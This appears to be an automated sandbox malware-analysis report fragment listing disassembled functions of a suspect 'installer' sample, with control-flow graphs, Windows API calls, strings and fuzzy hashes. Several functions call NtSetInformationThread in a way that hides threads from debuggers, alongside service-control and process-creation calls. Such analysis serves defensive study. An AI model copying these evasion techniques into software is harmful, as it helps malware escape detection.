4980->4984 4986 6c9e405a-6c9e4063 4981->4986 4982->4979 4989 6c9e40be-6c9e40c9 4982->4989 4988 6c9e3f6b-6c9e3f6f 4983->4988 4984->4985 4987 6c9e4090 4984->4987 4990 6c9e3f64-6c9e3f67 4985->4990 4991 6c9e4069-6c9e406c 4986->4991 4992 6c9e40f5-6c9e413f 4986->4992 4987->4952 4993 6c9e40a7 4987->4993 4988->4971 4989->4983 4994 6c9e40cb-6c9e40d4 4989->4994 4995 6c9e3f69 4990->4995 4996 6c9e4144-6c9e414b 4991->4996 4997 6c9e4072-6c9e4077 4991->4997 4992->4995 4993->4983 4994->4993 4998 6c9e40d6-6c9e40f0 4994->4998 4995->4988 4996->4988 4997->4990 4998->4986
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a35fa58d45b98c1cdd422138b43b6faf2862e61b28196371f68b7349d68b797d
                                      • Instruction ID: bb2482b437d124277decd47d29ca6dc7d2e2c27dd08637ec69521ef343dff010
                                      • Opcode Fuzzy Hash: a35fa58d45b98c1cdd422138b43b6faf2862e61b28196371f68b7349d68b797d
                                      • Instruction Fuzzy Hash: 9232D5322457018FC325CF28C8906A5B7E3FFE93147698A6CC0EA5BA65D775F44ACB50
                                      Function 6C9E3A6A Relevance: 3.1, APIs: 2, Instructions: 148threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: CurrentThread
                                      • String ID:
                                      • API String ID: 2882836952-0
                                      • Opcode ID: 0e67695622843bd7810fe5bcfadb056ff7cb48f3f603d78f8e62effb44115d00
                                      • Instruction ID: 8df931657db24c88708761229c7e3f4f07322ef2b666b6dbcf7bd3c9499c2623
                                      • Opcode Fuzzy Hash: 0e67695622843bd7810fe5bcfadb056ff7cb48f3f603d78f8e62effb44115d00
                                      • Instruction Fuzzy Hash: A151E2311547018FC322CF39C884795B7A3BFA9314F698E5DC0E61BAA5DB75F44A8B41
                                      Function 6C9E39CF Relevance: 3.1, APIs: 2, Instructions: 139threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: CurrentThread
                                      • String ID:
                                      • API String ID: 2882836952-0
                                      • Opcode ID: 58348398d1f116c7c628db4816a380e390d0ea52ac17b6f0742f6b00b637e932
                                      • Instruction ID: d7c4d43f7ff1b5910fbdc726e0acbfb9eba5436f47a8c12300a7e98a247c615f
                                      • Opcode Fuzzy Hash: 58348398d1f116c7c628db4816a380e390d0ea52ac17b6f0742f6b00b637e932
                                      • Instruction Fuzzy Hash: B451D131114B01CBC322CF39C4847A5B7A3BFA9314F698A5DC0E65BAA5DB71F44A8B91
                                      Function 6C9E3D18 Relevance: 3.1, APIs: 2, Instructions: 89threadnativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThread.KERNEL32 ref: 6C9E3E9D
                                      • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C9E3EAA
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: Thread$CurrentInformation
                                      • String ID:
                                      • API String ID: 1650627709-0
                                      • Opcode ID: a094e62509431ef43c0effa462623292e4e7a560aef5962c694ad3150fcbc6aa
                                      • Instruction ID: d0f4fb905e039ea34283e66c349fc300372ff789f5386cfc6759bd7694da3638
                                      • Opcode Fuzzy Hash: a094e62509431ef43c0effa462623292e4e7a560aef5962c694ad3150fcbc6aa
                                      • Instruction Fuzzy Hash: 58313131105B01CBC721CF74C8887D6B7A3BFAA314F2A8E5CC0A65BAA1DB74B0099B51
                                      Function 6C9E3D62 Relevance: 3.1, APIs: 2, Instructions: 83threadnativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThread.KERNEL32 ref: 6C9E3E9D
                                      • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C9E3EAA
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: Thread$CurrentInformation
                                      • String ID:
                                      • API String ID: 1650627709-0
                                      • Opcode ID: c5bcf13259c21d8fef5175ca636596ee1685ffe995ac3fb769fed439e472e557
                                      • Instruction ID: 25994bae70fcbbe5f456ef1b68b36355928c652ab2e520eb3a981929dc8b2e06
                                      • Opcode Fuzzy Hash: c5bcf13259c21d8fef5175ca636596ee1685ffe995ac3fb769fed439e472e557
                                      • Instruction Fuzzy Hash: 45310F31114701CBD721CF78C8847A6B7B6BFAA304F294E5CC0AA5BAA1DB71F0459B82
                                      Function 6CB68810 Relevance: 3.1, APIs: 2, Instructions: 72serviceCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6CB68820
                                      • OpenServiceA.ADVAPI32(?,?,00000004), ref: 6CB688C5
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: Open$ManagerService
                                      • String ID:
                                      • API String ID: 2351955762-0
                                      • Opcode ID: 20acbacc7228720c3f710b6728113f0c91634afdfa8c324581e69b5a1cadd4c2
                                      • Instruction ID: af02e6d36181ffe12fbea662fef1651e4c8b470e6e71c905fc4a76f4884a10f7
                                      • Opcode Fuzzy Hash: 20acbacc7228720c3f710b6728113f0c91634afdfa8c324581e69b5a1cadd4c2
                                      • Instruction Fuzzy Hash: AE312874618342AFC700CF2AC949A1EBBF0AB8A355F548C5EF498D7761D372C8489B63
                                      Function 6C9E3C62 Relevance: 3.1, APIs: 2, Instructions: 72threadnativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThread.KERNEL32 ref: 6C9E3E9D
                                      • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C9E3EAA
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: Thread$CurrentInformation
                                      • String ID:
                                      • API String ID: 1650627709-0
                                      • Opcode ID: 600c240e179074ab6c2d03fb46b3e4b3c4aba01c6878794498f99add940c8008
                                      • Instruction ID: 7912b14baa5bbe4fa4ee44a795c6d50b5c0b385f62f72ef3372e062b5e219f9f
                                      • Opcode Fuzzy Hash: 600c240e179074ab6c2d03fb46b3e4b3c4aba01c6878794498f99add940c8008
                                      • Instruction Fuzzy Hash: 9D213630118701CBD725CF74C8947A677B6BF7A305F194E6DC0A68BAA1DB74F0049B52
                                      Function 6CB5E090 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileA.KERNEL32(?,?), ref: 6CB5E0AC
                                      • FindClose.KERNEL32(000000FF), ref: 6CB5E0E2
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID:
                                      • API String ID: 2295610775-0
                                      • Opcode ID: 045f9ef4e4fd3d3a9fa35c4f871f11732a48233b3e976d669eb65b5a35910c9c
                                      • Instruction ID: 208c7639110ad452ef047ae0db9ed07d83469c60b1206c38b00b16a17205f1fa
                                      • Opcode Fuzzy Hash: 045f9ef4e4fd3d3a9fa35c4f871f11732a48233b3e976d669eb65b5a35910c9c
                                      • Instruction Fuzzy Hash: 33112B745082D19FC7108F29C94595EBBF8AB86314F984D4AF4A8CA690D738D8A88B83
                                      Function 6CB801C3 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 3722 6cb801c3-6cb801d3 3723 6cb801ed-6cb801ef 3722->3723 3724 6cb801d5-6cb801e8 call 6cb730cf call 6cb730bc 3722->3724 3726 6cb80554-6cb80561 call 6cb730cf call 6cb730bc 3723->3726 3727 6cb801f5-6cb801fb 3723->3727 3740 6cb8056c 3724->3740 3745 6cb80567 call 6cb73810 3726->3745 3727->3726 3730 6cb80201-6cb80227 3727->3730 3730->3726 3733 6cb8022d-6cb80236 3730->3733 3736 6cb80238-6cb8024b call 6cb730cf call 6cb730bc 3733->3736 3737 6cb80250-6cb80252 3733->3737 3736->3745 3738 6cb80258-6cb8025b 3737->3738 3739 6cb80550-6cb80552 3737->3739 3738->3739 3743 6cb80261-6cb80265 3738->3743 3744 6cb8056f-6cb80572 3739->3744 3740->3744 3743->3736 3747 6cb80267-6cb8027e 3743->3747 3745->3740 3750 6cb802cf-6cb802d5 3747->3750 3751 6cb80280-6cb80283 3747->3751 3755 6cb8029b-6cb802b2 call 6cb730cf call 6cb730bc call 6cb73810 3750->3755 3756 6cb802d7-6cb802e1 3750->3756 3753 6cb80293-6cb80299 3751->3753 3754 6cb80285-6cb8028e 3751->3754 3753->3755 3760 6cb802b7-6cb802ca 3753->3760 3759 6cb80353-6cb80363 3754->3759 3788 6cb80487 3755->3788 3757 6cb802e8-6cb80306 call 6cb77ee5 call 6cb77eab * 2 3756->3757 3758 6cb802e3-6cb802e5 3756->3758 3793 6cb80308-6cb8031e call 6cb730bc call 6cb730cf 3757->3793 3794 6cb80323-6cb8034c call 6cb7e359 3757->3794 3758->3757 3762 6cb80428-6cb80431 call 6cb850d5 3759->3762 3763 6cb80369-6cb80375 3759->3763 3760->3759 3777 6cb80433-6cb80445 3762->3777 3778 6cb804a4 3762->3778 3763->3762 3766 6cb8037b-6cb8037d 3763->3766 3766->3762 3770 6cb80383-6cb803a7 3766->3770 3770->3762 3774 6cb803a9-6cb803bf 3770->3774 3774->3762 3779 6cb803c1-6cb803c3 3774->3779 3777->3778 3783 6cb80447-6cb80456 GetConsoleMode 3777->3783 3781 6cb804a8-6cb804c0 ReadFile 3778->3781 3779->3762 3784 6cb803c5-6cb803eb 3779->3784 3786 6cb8051c-6cb80527 GetLastError 3781->3786 3787 6cb804c2-6cb804c8 3781->3787 3783->3778 3789 6cb80458-6cb8045c 3783->3789 3784->3762 3792 6cb803ed-6cb80403 3784->3792 3795 6cb80529-6cb8053b call 6cb730bc call 6cb730cf 3786->3795 3796 6cb80540-6cb80543 3786->3796 3787->3786 3797 6cb804ca 3787->3797 3791 6cb8048a-6cb80494 call 6cb77eab 3788->3791 3789->3781 3790 6cb8045e-6cb80478 ReadConsoleW 3789->3790 3798 6cb80499-6cb804a2 3790->3798 3799 6cb8047a GetLastError 3790->3799 3791->3744 3792->3762 3803 6cb80405-6cb80407 3792->3803 3793->3788 3794->3759 3795->3788 3800 6cb80549-6cb8054b 3796->3800 3801 6cb80480-6cb80486 call 6cb730e2 3796->3801 3807 6cb804cd-6cb804df 3797->3807 3798->3807 3799->3801 3800->3791 3801->3788 3803->3762 3810 6cb80409-6cb80423 3803->3810 3807->3791 3814 6cb804e1-6cb804e5 3807->3814 3810->3762 3815 6cb804fe-6cb80509 3814->3815 3816 6cb804e7-6cb804f7 call 6cb805ee 3814->3816 3822 6cb8050b call 6cb80573 3815->3822 3823 6cb80515-6cb8051a call 6cb808a6 3815->3823 3828 6cb804fa-6cb804fc 3816->3828 3829 6cb80510-6cb80513 3822->3829 3823->3829 3828->3791 3829->3828
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 8Q
                                      • API String ID: 0-4022487301
                                      • Opcode ID: 49470fea0c1ed7e827cf8a09d33374ca9f177a92be9ad6dd8f82a38022a06667
                                      • Instruction ID: a7e594e4e80c7317a0becf77a9df5c87e949e0faae258d172e224f53bf7016ff
                                      • Opcode Fuzzy Hash: 49470fea0c1ed7e827cf8a09d33374ca9f177a92be9ad6dd8f82a38022a06667
                                      • Instruction Fuzzy Hash: 39C1E270A0B2C59FDB01CF99D8A0BEDBBB4EF4A354F144159E820A7B81C7718945CB72
                                      Function 6CB8775C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 3831 6cb8775c-6cb8778c call 6cb87bdc 3834 6cb8778e-6cb87799 call 6cb730cf 3831->3834 3835 6cb877a7-6cb877b3 call 6cb84cfc 3831->3835 3842 6cb8779b-6cb877a2 call 6cb730bc 3834->3842 3840 6cb877cc-6cb87815 call 6cb87b47 3835->3840 3841 6cb877b5-6cb877ca call 6cb730cf call 6cb730bc 3835->3841 3850 6cb87882-6cb8788b GetFileType 3840->3850 3851 6cb87817-6cb87820 3840->3851 3841->3842 3852 6cb87a81-6cb87a85 3842->3852 3853 6cb8788d-6cb878be GetLastError call 6cb730e2 CloseHandle 3850->3853 3854 6cb878d4-6cb878d7 3850->3854 3856 6cb87822-6cb87826 3851->3856 3857 6cb87857-6cb8787d GetLastError call 6cb730e2 3851->3857 3853->3842 3868 6cb878c4-6cb878cf call 6cb730bc 3853->3868 3859 6cb878d9-6cb878de 3854->3859 3860 6cb878e0-6cb878e6 3854->3860 3856->3857 3861 6cb87828-6cb87855 call 6cb87b47 3856->3861 3857->3842 3866 6cb878ea-6cb87938 call 6cb84ea0 3859->3866 3865 6cb878e8 3860->3865 3860->3866 3861->3850 3861->3857 3865->3866 3874 6cb8793a-6cb87946 call 6cb87d56 3866->3874 3875 6cb87957-6cb8797f call 6cb87e00 3866->3875 3868->3842 3874->3875 3880 6cb87948 3874->3880 3881 6cb87981-6cb87982 3875->3881 3882 6cb87984-6cb879c5 3875->3882 3883 6cb8794a-6cb87952 call 6cb7f015 3880->3883 3881->3883 3884 6cb879e6-6cb879f4 3882->3884 3885 6cb879c7-6cb879cb 3882->3885 3883->3852 3888 6cb879fa-6cb879fe 3884->3888 3889 6cb87a7f 3884->3889 3885->3884 3887 6cb879cd-6cb879e1 3885->3887 3887->3884 3888->3889 3891 6cb87a00-6cb87a33 CloseHandle call 6cb87b47 3888->3891 3889->3852 3894 6cb87a35-6cb87a61 GetLastError call 6cb730e2 call 6cb84e0f 3891->3894 3895 6cb87a67-6cb87a7b 3891->3895 3894->3895 3895->3889
                                      APIs
                                        • Part of subcall function 6CB87B47: CreateFileW.KERNEL32(00000000,00000000,?,6CB87805,?,?,00000000,?,6CB87805,00000000,0000000C), ref: 6CB87B64
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB87870
                                      • __dosmaperr.LIBCMT ref: 6CB87877
                                      • GetFileType.KERNEL32(00000000), ref: 6CB87883
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB8788D
                                      • __dosmaperr.LIBCMT ref: 6CB87896
                                      • CloseHandle.KERNEL32(00000000), ref: 6CB878B6
                                      • CloseHandle.KERNEL32(6CB7E7C0), ref: 6CB87A03
                                      • GetLastError.KERNEL32 ref: 6CB87A35
                                      • __dosmaperr.LIBCMT ref: 6CB87A3C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                      • String ID: 8Q
                                      • API String ID: 4237864984-4022487301
                                      • Opcode ID: de9d409d2499d49109006c2c38f099d5adc8c25eb43ca58ce610f00e74437f37
                                      • Instruction ID: d539615ba9e941d442a40962042f9bbf222b1928faae48a960867eab3297a2ee
                                      • Opcode Fuzzy Hash: de9d409d2499d49109006c2c38f099d5adc8c25eb43ca58ce610f00e74437f37
                                      • Instruction Fuzzy Hash: C7A10332B151859FCF199F68C8A1BAD7BB5EB07328F180159F811BB390D7B58906CB52
                                      Function 6CB3B4D0 Relevance: 16.6, APIs: 3, Strings: 6, Instructions: 834fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WriteFile.KERNEL32(?,?,00000038,?,00000000), ref: 6CB3B62F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID: *$,=ym$-=ym$-=ym$B$H
                                      • API String ID: 3934441357-3163594065
                                      • Opcode ID: 3a4dc55e02001829340989c739d9fa14333801f895b665b769631ca0bd49e567
                                      • Instruction ID: 3b88d9ab1b72795a34d2f048356f3c23485c92168b5981768687f9cc3ef76258
                                      • Opcode Fuzzy Hash: 3a4dc55e02001829340989c739d9fa14333801f895b665b769631ca0bd49e567
                                      • Instruction Fuzzy Hash: 4E72BCB16097958FCB14CF28C4A065EBBE1AFC9304F189E1EE499CBB54E734D8858B53
                                      Function 6C9E4200 Relevance: 9.0, APIs: 3, Strings: 1, Instructions: 2005COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ;T55
                                      • API String ID: 0-2572755013
                                      • Opcode ID: af6f60c50f8f60a0417bfe6d3ca778d4749f42f5d208244dfc71111972f1c343
                                      • Instruction ID: 92b739fa049618d5ec12872c20b1c0bddc8e52f806efb2e910c26f5a223930c4
                                      • Opcode Fuzzy Hash: af6f60c50f8f60a0417bfe6d3ca778d4749f42f5d208244dfc71111972f1c343
                                      • Instruction Fuzzy Hash: 0303D331645B018FC729CF28C8D0696B7E3AFD532871D8B6DC0AA4BA95DB74F44ACB50
                                      Function 6CB686E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62processsynchronizationCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 4469 6cb686e0-6cb68767 CreateProcessA 4470 6cb6878b-6cb68794 4469->4470 4471 6cb68796-6cb6879b 4470->4471 4472 6cb687b0-6cb687fa WaitForSingleObject CloseHandle * 2 4470->4472 4473 6cb68770-6cb68783 4471->4473 4474 6cb6879d-6cb687a2 4471->4474 4472->4470 4473->4470 4474->4470 4475 6cb687a4-6cb68807 4474->4475
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
